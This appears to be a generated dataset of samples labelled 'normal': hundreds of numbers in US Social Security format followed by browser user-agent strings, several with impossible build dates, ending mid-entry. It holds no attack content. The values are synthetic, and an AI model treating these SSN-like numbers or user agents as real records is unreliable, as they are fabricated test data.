+normal,'041-65-1915' +normal,'215-30-7002' +normal,'183-95-2657' +normal,'425-97-9205' +normal,'805-16-9937' +normal,'306-22-6018' +normal,'357-06-6352' +normal,'293-39-6729' +normal,'861-23-2491' +normal,'645-43-7742' +normal,'382-84-1605' +normal,'365-10-3559' +normal,'358-44-3941' +normal,'045-74-0519' +normal,'898-86-4206' +normal,'888-76-8407' +normal,'383-05-0622' +normal,'456-72-3979' +normal,'836-28-7539' +normal,'374-93-4063' +normal,'552-66-3062' +normal,'585-70-1044' +normal,'066-24-5399' +normal,'444-24-9320' +normal,'824-31-8535' +normal,'200-27-4436' +normal,'875-29-2243' +normal,'384-13-7234' +normal,'357-83-2498' +normal,'332-48-0540' +normal,'018-36-4548' +normal,'795-52-7434' +normal,'459-68-1216' +normal,'846-85-8182' +normal,'110-97-0232' +normal,'430-99-5193' +normal,'062-84-2028' +normal,'844-03-3964' +normal,'763-74-4164' +normal,'255-98-8592' +normal,'454-34-7408' +normal,'766-22-6953' +normal,'338-74-5754' +normal,'455-25-0980' +normal,'288-19-5868' +normal,'045-51-0780' +normal,'193-16-2693' +normal,'341-98-1419' +normal,'512-92-1622' +normal,'250-86-2252' +normal,'764-70-4688' +normal,'185-08-2714' +normal,'291-05-7249' +normal,'410-75-9951' +normal,'208-17-3184' +normal,'794-57-0078' +normal,'560-31-1994' +normal,'847-76-0877' +normal,'771-13-7015' +normal,'242-05-4543' +normal,'889-07-7773' +normal,'824-46-6730' +normal,'642-36-8269' +normal,'403-25-3004' +normal,'501-46-1269' +normal,'388-58-0623' +normal,'034-80-3551' +normal,'190-26-5979' +normal,'610-26-2029' +normal,'300-34-9662' +normal,'630-02-2428' +normal,'693-33-6757' +normal,'777-35-3516' +normal,'505-58-8554' +normal,'172-59-6169' +normal,'764-11-7427' +normal,'061-93-7623' +normal,'127-76-9783' +normal,'634-94-1410' +normal,'123-80-0527' +normal,'893-84-8597' +normal,'357-39-8056' +normal,'559-95-6893' +normal,'626-59-6706' +normal,'617-89-0279' +normal,'724-19-7249' +normal,'353-42-1089' +normal,'827-42-3825' +normal,'555-71-5837' +normal,'052-77-2560' +normal,'301-17-0352' +normal,'607-34-8612' +normal,'836-75-3702' +normal,'499-14-7418' +normal,'097-39-5453' +normal,'717-18-4732' +normal,'852-36-5760' +normal,'271-54-3661' +normal,'429-81-8657' +normal,'052-87-4528' +normal,'884-86-2593' +normal,'528-94-9185' +normal,'736-05-4989' +normal,'082-09-1675' +normal,'163-89-5859' +normal,'675-35-4191' +normal,'637-25-9904' +normal,'116-49-6625' +normal,'221-54-5748' +normal,'335-71-9449' +normal,'749-49-6796' +normal,'336-10-1446' +normal,'606-06-3812' +normal,'225-69-5297' +normal,'443-79-2731' +normal,'733-09-0209' +normal,'348-23-0997' +normal,'693-39-3141' +normal,'656-41-1826' +normal,'691-55-3115' +normal,'218-42-0947' +normal,'327-11-6124' +normal,'711-97-1040' +normal,'427-04-4999' +normal,'274-73-8070' +normal,'501-61-6429' +normal,'415-45-7640' +normal,'349-12-4280' +normal,'449-80-2160' +normal,'187-42-0649' +normal,'163-07-5984' +normal,'234-62-4116' +normal,'014-25-8404' +normal,'116-16-5213' +normal,'743-62-8476' +normal,'646-62-6719' +normal,'772-37-1671' +normal,'730-52-2689' +normal,'433-78-0788' +normal,'071-17-3384' +normal,'709-98-9934' +normal,'180-13-5136' +normal,'692-90-1282' +normal,'770-75-5941' +normal,'159-93-5760' +normal,'575-64-9738' +normal,'541-20-4068' +normal,'849-79-1913' +normal,'771-13-3369' +normal,'822-81-8981' +normal,'704-15-9341' +normal,'200-53-0099' +normal,'761-63-0587' +normal,'538-76-8076' +normal,'700-06-5636' +normal,'840-30-7576' +normal,'783-38-2168' +normal,'066-57-9383' +normal,'738-10-2709' +normal,'872-02-8321' +normal,'347-89-7008' +normal,'641-96-8022' +normal,'750-66-2459' +normal,'714-11-1851' +normal,'566-50-9825' +normal,'492-48-5633' +normal,'211-02-1168' +normal,'626-36-5958' +normal,'104-37-5971' +normal,'280-07-0184' +normal,'054-22-9112' +normal,'123-85-3404' +normal,'019-62-2196' +normal,'426-57-3017' +normal,'415-44-9971' +normal,'120-38-0870' +normal,'489-03-7285' +normal,'890-28-0834' +normal,'660-09-4890' +normal,'761-30-4508' +normal,'591-31-8791' +normal,'548-71-6642' +normal,'868-83-4818' +normal,'539-93-6965' +normal,'790-55-4658' +normal,'364-89-1718' +normal,'391-85-9466' +normal,'848-32-6731' +normal,'398-94-5860' +normal,'797-70-7410' +normal,'021-73-0992' +normal,'095-74-2896' +normal,'776-33-6557' +normal,'833-07-2357' +normal,'745-18-4088' +normal,'482-07-3509' +normal,'330-73-1586' +normal,'093-20-5842' +normal,'441-26-7626' +normal,'347-34-7573' +normal,'086-11-5090' +normal,'466-85-3382' +normal,'833-34-3585' +normal,'019-66-3263' +normal,'340-13-7905' +normal,'644-18-3284' +normal,'303-67-9886' +normal,'449-83-4904' +normal,'344-23-3666' +normal,'203-93-6745' +normal,'812-60-3450' +normal,'646-43-4152' +normal,'124-54-2844' +normal,'887-77-7386' +normal,'003-77-4008' +normal,'274-16-0466' +normal,'574-83-5753' +normal,'129-41-2397' +normal,'481-25-9234' +normal,'786-56-9767' +normal,'633-08-2802' +normal,'121-82-7864' +normal,'846-93-8949' +normal,'338-51-0723' +normal,'385-39-1644' +normal,'361-57-1947' +normal,'780-77-5629' +normal,'070-72-3080' +normal,'891-57-5873' +normal,'331-48-9601' +normal,'790-17-8730' +normal,'183-63-2584' +normal,'843-93-5711' +normal,'533-48-3161' +normal,'758-51-1282' +normal,'155-82-0151' +normal,'155-53-9482' +normal,'234-55-4658' +normal,'764-06-9505' +normal,'334-36-0403' +normal,'893-62-9661' +normal,'487-50-7337' +normal,'407-43-7960' +normal,'607-46-5623' +normal,'899-77-7951' +normal,'776-51-5997' +normal,'748-14-7484' +normal,'230-74-4227' +normal,'792-88-3554' +normal,'358-75-5754' +normal,'882-86-3281' +normal,'042-76-6900' +normal,'350-01-6939' +normal,'685-94-9057' +normal,'893-65-4826' +normal,'742-87-3662' +normal,'533-86-4157' +normal,'684-15-6502' +normal,'402-96-8023' +normal,'797-83-7247' +normal,'285-03-2613' +normal,'521-20-5638' +normal,'508-65-2858' +normal,'497-70-8264' +normal,'388-46-4987' +normal,'358-45-7046' +normal,'004-74-0508' +normal,'377-69-3477' +normal,'212-74-3964' +normal,'273-73-6711' +normal,'547-01-7903' +normal,'141-75-5201' +normal,'841-45-0114' +normal,'147-53-1114' +normal,'482-27-9216' +normal,'470-50-0542' +normal,'282-66-1898' +normal,'820-73-0557' +normal,'633-56-2297' +normal,'086-12-1707' +normal,'777-77-1740' +normal,'730-77-5426' +normal,'388-30-4524' +normal,'105-35-4526' +normal,'033-60-5161' +normal,'205-24-1024' +normal,'556-72-7034' +normal,'535-30-8154' +normal,'166-51-2116' +normal,'457-45-9678' +normal,'486-56-7153' +normal,'005-23-7944' +normal,'765-37-4570' +normal,'231-14-5533' +normal,'352-67-0848' +normal,'392-35-5238' +normal,'755-67-3580' +normal,'298-16-3895' +normal,'365-52-7824' +normal,'170-08-5082' +normal,'222-51-6079' +normal,'018-37-8711' +normal,'624-49-0444' +normal,'097-74-8199' +normal,'146-76-7029' +normal,'629-79-6233' +normal,'373-73-7769' +normal,'773-41-3193' +normal,'034-19-9573' +normal,'394-14-4773' +normal,'012-05-4788' +normal,'654-05-3035' +normal,'653-95-0055' +normal,'140-34-4075' +normal,'085-28-6910' +normal,'473-01-2198' +normal,'721-40-1628' +normal,'124-07-3940' +normal,'707-91-1261' +normal,'115-45-7002' +normal,'712-18-4102' +normal,'027-96-3079' +normal,'034-12-6725' +normal,'716-44-9960' +normal,'864-54-0231' +normal,'376-84-8849' +normal,'005-69-3399' +normal,'025-66-6713' +normal,'711-23-5597' +normal,'717-94-3240' +normal,'067-15-9992' +normal,'088-92-0513' +normal,'059-18-1660' +normal,'298-58-8323' +normal,'814-63-2745' +normal,'280-23-9870' +normal,'448-21-9674' +normal,'626-60-9030' +normal,'319-02-6694' +normal,'888-81-0082' +normal,'338-50-9987' +normal,'417-50-6487' +normal,'288-37-8921' +normal,'471-79-0388' +normal,'179-99-4366' +normal,'120-52-4214' +normal,'398-73-8958' +normal,'675-55-9354' +normal,'361-12-9700' +normal,'231-74-5380' +normal,'745-06-1093' +normal,'776-58-7609' +normal,'731-87-8671' +normal,'520-72-2587' +normal,'274-37-5725' +normal,'818-64-2306' +normal,'276-82-6049' +normal,'175-23-9479' +normal,'129-38-0973' +normal,'114-61-4511' +normal,'415-91-3911' +normal,'552-32-0791' +normal,'791-20-7122' +normal,'332-32-4731' +normal,'478-01-0416' +normal,'423-73-9979' +normal,'222-97-9585' +normal,'499-42-1186' +normal,'690-83-7903' +normal,'106-44-2377' +normal,'802-25-7882' +normal,'110-71-9044' +normal,'343-84-3009' +normal,'796-62-8274' +normal,'013-05-0682' +normal,'065-20-7781' +normal,'397-92-5107' +normal,'093-44-6843' +normal,'403-41-0082' +normal,'672-47-9806' +normal,'190-44-1586' +normal,'013-85-5460' +normal,'524-51-8235' +normal,'125-90-6882' +normal,'597-38-3843' +normal,'184-33-0270' +normal,'336-99-2952' +normal,'678-36-5168' +normal,'054-75-7708' +normal,'863-22-1320' +normal,'252-88-5883' +normal,'415-41-1008' +normal,'466-29-2899' +normal,'309-45-4148' +normal,'846-28-0218' +normal,'014-06-1059' +normal,'023-34-1996' +normal,'457-40-0236' +normal,'718-31-9052' +normal,'627-63-3865' +normal,'444-81-1956' +normal,'229-63-3896' +normal,'082-89-3590' +normal,'574-67-9093' +normal,'770-11-1083' +normal,'812-27-5248' +normal,'243-47-5034' +normal,'079-91-1046' +normal,'212-28-1859' +normal,'863-65-7920' +normal,'579-29-5686' +normal,'594-47-9125' +normal,'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/533.1 (KHTML, like Gecko) Chrome/60.0.800.0 Safari/533.1' +normal,'Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/532.1 (KHTML, like Gecko) CriOS/25.0.884.0 Mobile/23P755 Safari/532.1' +normal,'Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/535.33.2 (KHTML, like Gecko) Version/5.0 Safari/535.33.2' +normal,'Mozilla/5.0 (Windows; U; Windows CE) AppleWebKit/531.27.5 (KHTML, like Gecko) Version/4.1 Safari/531.27.5' +normal,'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.0; Trident/3.1)' +normal,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_10_2 rv:5.0; hu-HU) AppleWebKit/534.23.2 (KHTML, like Gecko) Version/5.0 Safari/534.23.2' +normal,'Opera/9.26.(Windows NT 5.1; oc-FR) Presto/2.9.189 Version/11.00' +normal,'Mozilla/5.0 (Android 3.1; Mobile; rv:36.0) Gecko/36.0 Firefox/36.0' +normal,'Mozilla/5.0 (Macintosh; PPC Mac OS X 10_10_7 rv:5.0; zh-HK) AppleWebKit/533.43.4 (KHTML, like Gecko) Version/5.0 Safari/533.43.4' +normal,'Mozilla/5.0 (X11; Linux i686) AppleWebKit/533.1 (KHTML, like Gecko) Chrome/56.0.802.0 Safari/533.1' +normal,'Mozilla/5.0 (Windows NT 5.2) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/28.0.893.0 Safari/532.0' +normal,'Opera/8.95.(X11; Linux i686; rw-RW) Presto/2.9.163 Version/10.00' +normal,'Mozilla/5.0 (Windows NT 5.0; ku-TR; rv:1.9.2.20) Gecko/9284-07-25 11:47:36.674622 Firefox/10.0' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows 95; Trident/3.1)' +normal,'Opera/9.14.(Windows 98; ln-CD) Presto/2.9.178 Version/12.00' +normal,'Mozilla/5.0 (Linux; Android 5.1) AppleWebKit/533.1 (KHTML, like Gecko) Chrome/22.0.830.0 Safari/533.1' +normal,'Mozilla/5.0 (Linux; Android 4.2) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/43.0.817.0 Safari/534.1' +normal,'Mozilla/5.0 (Macintosh; PPC Mac OS X 10_7_8 rv:5.0; ve-ZA) AppleWebKit/533.5.3 (KHTML, like Gecko) Version/5.1 Safari/533.5.3' +normal,'Opera/8.32.(Windows NT 6.1; ko-KR) Presto/2.9.186 Version/10.00' +normal,'Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 6.2; Trident/5.0)' +normal,'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/3.1)' +normal,'Mozilla/5.0 (compatible; MSIE 9.0; Windows 98; Trident/3.0)' +normal,'Mozilla/5.0 (Android 1.1; Mobile; rv:56.0) Gecko/56.0 Firefox/56.0' +normal,'Mozilla/5.0 (Linux; Android 4.3) AppleWebKit/536.0 (KHTML, like Gecko) Chrome/54.0.817.0 Safari/536.0' +normal,'Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2 like Mac OS X; wo-SN) AppleWebKit/531.14.7 (KHTML, like Gecko) Version/3.0.5 Mobile/8B115 Safari/6531.14.7' +normal,'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/3.0)' +normal,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_10_1) AppleWebKit/533.1 (KHTML, like Gecko) Chrome/24.0.827.0 Safari/533.1' +normal,'Opera/9.70.(X11; Linux x86_64; lij-IT) Presto/2.9.185 Version/10.00' +normal,'Mozilla/5.0 (compatible; MSIE 5.0; Windows 98; Win 9x 4.90; Trident/4.0)' +normal,'Opera/8.95.(X11; Linux x86_64; gv-GB) Presto/2.9.187 Version/10.00' +normal,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_12_4) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/45.0.812.0 Safari/531.0' +normal,'Mozilla/5.0 (Windows NT 5.01; my-MM; rv:1.9.2.20) Gecko/6124-10-10 00:00:04.011719 Firefox/13.0' +normal,'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 10.0; Trident/3.1)' +normal,'Mozilla/5.0 (Windows NT 4.0) AppleWebKit/531.1 (KHTML, like Gecko) Chrome/51.0.858.0 Safari/531.1' +normal,'Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/2162-02-18 06:57:45.079076 Firefox/13.0' +normal,'Mozilla/5.0 (iPad; CPU iPad OS 14_2 like Mac OS X) AppleWebKit/534.1 (KHTML, like Gecko) CriOS/58.0.813.0 Mobile/46F616 Safari/534.1' +normal,'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/533.1 (KHTML, like Gecko) CriOS/39.0.808.0 Mobile/21N789 Safari/533.1' +normal,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0 rv:6.0; tg-TJ) AppleWebKit/531.40.6 (KHTML, like Gecko) Version/4.1 Safari/531.40.6' +normal,'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/533.0 (KHTML, like Gecko) Chrome/63.0.874.0 Safari/533.0' +normal,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_10_4) AppleWebKit/536.1 (KHTML, like Gecko) Chrome/30.0.857.0 Safari/536.1' +normal,'Mozilla/5.0 (iPod; U; CPU iPhone OS 3_2 like Mac OS X; hsb-DE) AppleWebKit/534.45.1 (KHTML, like Gecko) Version/4.0.5 Mobile/8B112 Safari/6534.45.1' +normal,'Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/533.13.6 (KHTML, like Gecko) Version/5.0.2 Safari/533.13.6' +normal,'Opera/8.21.(Windows 98; Win 9x 4.90; yue-HK) Presto/2.9.178 Version/11.00' +normal,'Opera/8.77.(X11; Linux i686; mni-IN) Presto/2.9.165 Version/11.00' +normal,'Opera/9.92.(Windows NT 6.2; hsb-DE) Presto/2.9.169 Version/11.00' +normal,'Opera/9.98.(Windows 95; niu-NZ) Presto/2.9.181 Version/10.00' +normal,'Mozilla/5.0 (Windows; U; Windows NT 10.0) AppleWebKit/534.9.1 (KHTML, like Gecko) Version/4.0.4 Safari/534.9.1' +normal,'Mozilla/5.0 (Windows; U; Windows CE) AppleWebKit/534.20.7 (KHTML, like Gecko) Version/5.0.4 Safari/534.20.7' +normal,'Mozilla/5.0 (iPhone; CPU iPhone OS 4_2_1 like Mac OS X) AppleWebKit/535.0 (KHTML, like Gecko) FxiOS/14.1y4034.0 Mobile/96K243 Safari/535.0' +normal,'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.0; Trident/5.0)' +normal,'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_7_8 rv:5.0; gez-ET) AppleWebKit/533.36.1 (KHTML, like Gecko) Version/4.0.1 Safari/533.36.1' +normal,'Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/3480-09-21 01:12:35.822815 Firefox/3.6.7' +normal,'Mozilla/5.0 (iPhone; CPU iPhone OS 4_2_1 like Mac OS X) AppleWebKit/535.0 (KHTML, like Gecko) CriOS/44.0.880.0 Mobile/00E956 Safari/535.0' +normal,'Opera/8.80.(X11; Linux x86_64; cs-CZ) Presto/2.9.171 Version/11.00' +normal,'Mozilla/5.0 (iPad; CPU iPad OS 9_3_5 like Mac OS X) AppleWebKit/531.1 (KHTML, like Gecko) CriOS/24.0.823.0 Mobile/26I614 Safari/531.1' +normal,'Mozilla/5.0 (Android 5.0.2; Mobile; rv:29.0) Gecko/29.0 Firefox/29.0' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.0; Trident/5.0)' +normal,'Mozilla/5.0 (Macintosh; PPC Mac OS X 10_5_0 rv:5.0; the-NP) AppleWebKit/532.10.6 (KHTML, like Gecko) Version/5.0.4 Safari/532.10.6' +normal,'Mozilla/5.0 (iPad; CPU iPad OS 10_3_3 like Mac OS X) AppleWebKit/536.2 (KHTML, like Gecko) CriOS/32.0.833.0 Mobile/00H906 Safari/536.2' +normal,'Mozilla/5.0 (Android 4.0.4; Mobile; rv:42.0) Gecko/42.0 Firefox/42.0' +normal,'Opera/8.20.(Windows CE; sc-IT) Presto/2.9.177 Version/11.00' +normal,'Mozilla/5.0 (Linux; Android 4.4.2) AppleWebKit/531.1 (KHTML, like Gecko) Chrome/28.0.820.0 Safari/531.1' +normal,'Mozilla/5.0 (Windows; U; Windows 98) AppleWebKit/532.2.1 (KHTML, like Gecko) Version/5.1 Safari/532.2.1' +normal,'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_4 like Mac OS X) AppleWebKit/534.1 (KHTML, like Gecko) CriOS/63.0.835.0 Mobile/37H278 Safari/534.1' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/3.0)' +normal,'Mozilla/5.0 (iPad; CPU iPad OS 14_2 like Mac OS X) AppleWebKit/532.2 (KHTML, like Gecko) FxiOS/14.3n0675.0 Mobile/97G997 Safari/532.2' +normal,'Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/4427-11-29 05:30:50.959335 Firefox/3.8' +normal,'Mozilla/5.0 (iPod; U; CPU iPhone OS 4_3 like Mac OS X; tl-PH) AppleWebKit/532.43.5 (KHTML, like Gecko) Version/4.0.5 Mobile/8B112 Safari/6532.43.5' +normal,'Mozilla/5.0 (iPod; U; CPU iPhone OS 3_1 like Mac OS X; ce-RU) AppleWebKit/532.47.5 (KHTML, like Gecko) Version/3.0.5 Mobile/8B115 Safari/6532.47.5' +normal,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4; rv:1.9.4.20) Gecko/7119-09-28 16:22:27.893768 Firefox/3.8' +normal,'Mozilla/5.0 (Windows CE) AppleWebKit/535.0 (KHTML, like Gecko) Chrome/62.0.896.0 Safari/535.0' +normal,'Mozilla/5.0 (Android 2.3.4; Mobile; rv:29.0) Gecko/29.0 Firefox/29.0' +normal,'Opera/9.70.(X11; Linux x86_64; nl-NL) Presto/2.9.174 Version/11.00' +normal,'Opera/8.88.(X11; Linux i686; yo-NG) Presto/2.9.183 Version/10.00' +normal,'Mozilla/5.0 (iPhone; CPU iPhone OS 3_1_3 like Mac OS X) AppleWebKit/536.1 (KHTML, like Gecko) CriOS/17.0.823.0 Mobile/11V222 Safari/536.1' +normal,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4 rv:3.0; zu-ZA) AppleWebKit/534.3.1 (KHTML, like Gecko) Version/4.0 Safari/534.3.1' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/5.1)' +normal,'Mozilla/5.0 (iPad; CPU iPad OS 9_3_6 like Mac OS X) AppleWebKit/536.0 (KHTML, like Gecko) FxiOS/17.9u8917.0 Mobile/81Z370 Safari/536.0' +normal,'Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 5.1; Trident/3.1)' +normal,'Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/533.7.2 (KHTML, like Gecko) Version/5.1 Safari/533.7.2' +normal,'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/25.0.882.0 Safari/535.2' +normal,'Opera/9.80.(X11; Linux x86_64; brx-IN) Presto/2.9.182 Version/12.00' +normal,'Mozilla/5.0 (Linux; Android 7.1) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/30.0.832.0 Safari/534.1' +normal,'Mozilla/5.0 (iPad; CPU iPad OS 12_4_8 like Mac OS X) AppleWebKit/533.2 (KHTML, like Gecko) FxiOS/12.0c4212.0 Mobile/99I367 Safari/533.2' +normal,'Mozilla/5.0 (iPad; CPU iPad OS 5_1_1 like Mac OS X) AppleWebKit/534.2 (KHTML, like Gecko) FxiOS/11.2p5912.0 Mobile/66U681 Safari/534.2' +normal,'Mozilla/5.0 (iPod; U; CPU iPhone OS 3_3 like Mac OS X; pa-PK) AppleWebKit/532.44.4 (KHTML, like Gecko) Version/3.0.5 Mobile/8B115 Safari/6532.44.4' +normal,'Opera/8.94.(X11; Linux x86_64; om-KE) Presto/2.9.178 Version/12.00' +normal,'Opera/8.65.(X11; Linux i686; dz-BT) Presto/2.9.169 Version/12.00' +normal,'Opera/9.90.(X11; Linux x86_64; oc-FR) Presto/2.9.170 Version/12.00' +normal,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; rv:1.9.2.20) Gecko/9624-11-06 23:09:19.354309 Firefox/5.0' +normal,'Mozilla/5.0 (iPad; CPU iPad OS 9_3_5 like Mac OS X) AppleWebKit/532.0 (KHTML, like Gecko) FxiOS/11.1h3408.0 Mobile/32D542 Safari/532.0' +normal,'Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2 like Mac OS X; tk-TM) AppleWebKit/532.30.1 (KHTML, like Gecko) Version/4.0.5 Mobile/8B118 Safari/6532.30.1' +normal,'Mozilla/5.0 (Linux; Android 8.0.0) AppleWebKit/533.1 (KHTML, like Gecko) Chrome/59.0.870.0 Safari/533.1' +normal,'Mozilla/5.0 (Macintosh; PPC Mac OS X 10_8_0 rv:2.0; ja-JP) AppleWebKit/532.5.4 (KHTML, like Gecko) Version/4.0.4 Safari/532.5.4' +normal,'Opera/8.22.(X11; Linux i686; om-KE) Presto/2.9.161 Version/11.00' +normal,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3 rv:6.0; yue-HK) AppleWebKit/534.40.7 (KHTML, like Gecko) Version/5.0.4 Safari/534.40.7' +normal,'Mozilla/5.0 (Windows NT 5.2; fi-FI; rv:1.9.0.20) Gecko/2571-01-25 22:25:10.568577 Firefox/3.6.16' +normal,'Mozilla/5.0 (Linux; Android 4.2) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/13.0.808.0 Safari/533.2' +normal,'Mozilla/5.0 (Windows; U; Windows NT 4.0) AppleWebKit/532.12.4 (KHTML, like Gecko) Version/4.0.4 Safari/532.12.4' +normal,'Opera/9.36.(X11; Linux i686; hy-AM) Presto/2.9.174 Version/12.00' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/3.1)' +normal,'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/533.0 (KHTML, like Gecko) Chrome/24.0.815.0 Safari/533.0' +normal,'Mozilla/5.0 (compatible; MSIE 9.0; Windows CE; Trident/5.0)' +normal,'Mozilla/5.0 (Windows NT 5.01; pap-AN; rv:1.9.0.20) Gecko/4343-12-09 08:40:51.337708 Firefox/3.8' +normal,'Mozilla/5.0 (Android 2.3; Mobile; rv:26.0) Gecko/26.0 Firefox/26.0' +normal,'Opera/8.35.(Windows NT 6.0; eu-FR) Presto/2.9.164 Version/12.00' +normal,'Opera/9.48.(Windows 95; hne-IN) Presto/2.9.189 Version/10.00' +normal,'Mozilla/5.0 (compatible; MSIE 5.0; Windows 95; Trident/5.1)' +normal,'Opera/8.82.(X11; Linux i686; bho-IN) Presto/2.9.168 Version/12.00' +normal,'Mozilla/5.0 (compatible; MSIE 6.0; Windows 95; Trident/5.1)' +normal,'Mozilla/5.0 (Macintosh; PPC Mac OS X 10_5_9) AppleWebKit/533.0 (KHTML, like Gecko) Chrome/24.0.884.0 Safari/533.0' +normal,'Mozilla/5.0 (Macintosh; PPC Mac OS X 10_11_3; rv:1.9.4.20) Gecko/9149-08-30 17:38:43.750702 Firefox/3.6.5' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 4.0; Trident/5.0)' +normal,'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/3.0)' +normal,'Opera/9.13.(X11; Linux x86_64; cmn-TW) Presto/2.9.188 Version/12.00' +normal,'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)' +normal,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5 rv:6.0; ln-CD) AppleWebKit/534.27.7 (KHTML, like Gecko) Version/4.1 Safari/534.27.7' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.1)' +normal,'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.1)' +normal,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_3 rv:5.0; crh-UA) AppleWebKit/533.26.6 (KHTML, like Gecko) Version/4.1 Safari/533.26.6' +normal,'Opera/9.36.(Windows 98; ht-HT) Presto/2.9.190 Version/11.00' +normal,'Mozilla/5.0 (compatible; MSIE 5.0; Windows 98; Win 9x 4.90; Trident/5.0)' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows 95; Trident/5.0)' +normal,'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.1)' +normal,'Opera/9.85.(Windows 95; unm-US) Presto/2.9.164 Version/11.00' +normal,'Mozilla/5.0 (iPod; U; CPU iPhone OS 3_1 like Mac OS X; nb-NO) AppleWebKit/531.10.6 (KHTML, like Gecko) Version/3.0.5 Mobile/8B117 Safari/6531.10.6' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows 98; Trident/4.0)' +normal,'Opera/9.83.(X11; Linux x86_64; bhb-IN) Presto/2.9.169 Version/11.00' +normal,'Mozilla/5.0 (X11; Linux i686) AppleWebKit/536.0 (KHTML, like Gecko) Chrome/61.0.893.0 Safari/536.0' +normal,'Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2 like Mac OS X; yo-NG) AppleWebKit/532.46.7 (KHTML, like Gecko) Version/4.0.5 Mobile/8B111 Safari/6532.46.7' +normal,'Opera/8.61.(X11; Linux x86_64; the-NP) Presto/2.9.168 Version/11.00' +normal,'Mozilla/5.0 (Windows NT 4.0) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/21.0.833.0 Safari/534.2' +normal,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/50.0.886.0 Safari/535.2' +normal,'Mozilla/5.0 (Android 2.0.1; Mobile; rv:13.0) Gecko/13.0 Firefox/13.0' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.0; Trident/3.0)' +normal,'Opera/8.78.(Windows CE; hi-IN) Presto/2.9.175 Version/11.00' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/3.1)' +normal,'Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2 like Mac OS X; apn-IN) AppleWebKit/531.26.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.26.2' +normal,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_9; rv:1.9.3.20) Gecko/2768-01-31 11:40:20.743393 Firefox/5.0' +normal,'Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/534.21.3 (KHTML, like Gecko) Version/5.0.1 Safari/534.21.3' +normal,'Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 5.01; Trident/5.0)' +normal,'Mozilla/5.0 (Windows; U; Windows NT 4.0) AppleWebKit/533.31.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.31.4' +normal,'Opera/9.21.(X11; Linux x86_64; yi-US) Presto/2.9.183 Version/12.00' +normal,'Mozilla/5.0 (Windows; U; Windows 95) AppleWebKit/535.11.6 (KHTML, like Gecko) Version/4.1 Safari/535.11.6' +normal,'Mozilla/5.0 (compatible; MSIE 8.0; Windows 95; Trident/3.1)' +normal,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_2_1 like Mac OS X) AppleWebKit/536.1 (KHTML, like Gecko) CriOS/46.0.863.0 Mobile/17I771 Safari/536.1' +normal,'Mozilla/5.0 (Windows CE) AppleWebKit/533.0 (KHTML, like Gecko) Chrome/18.0.805.0 Safari/533.0' +normal,'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_10_4; rv:1.9.5.20) Gecko/2493-07-16 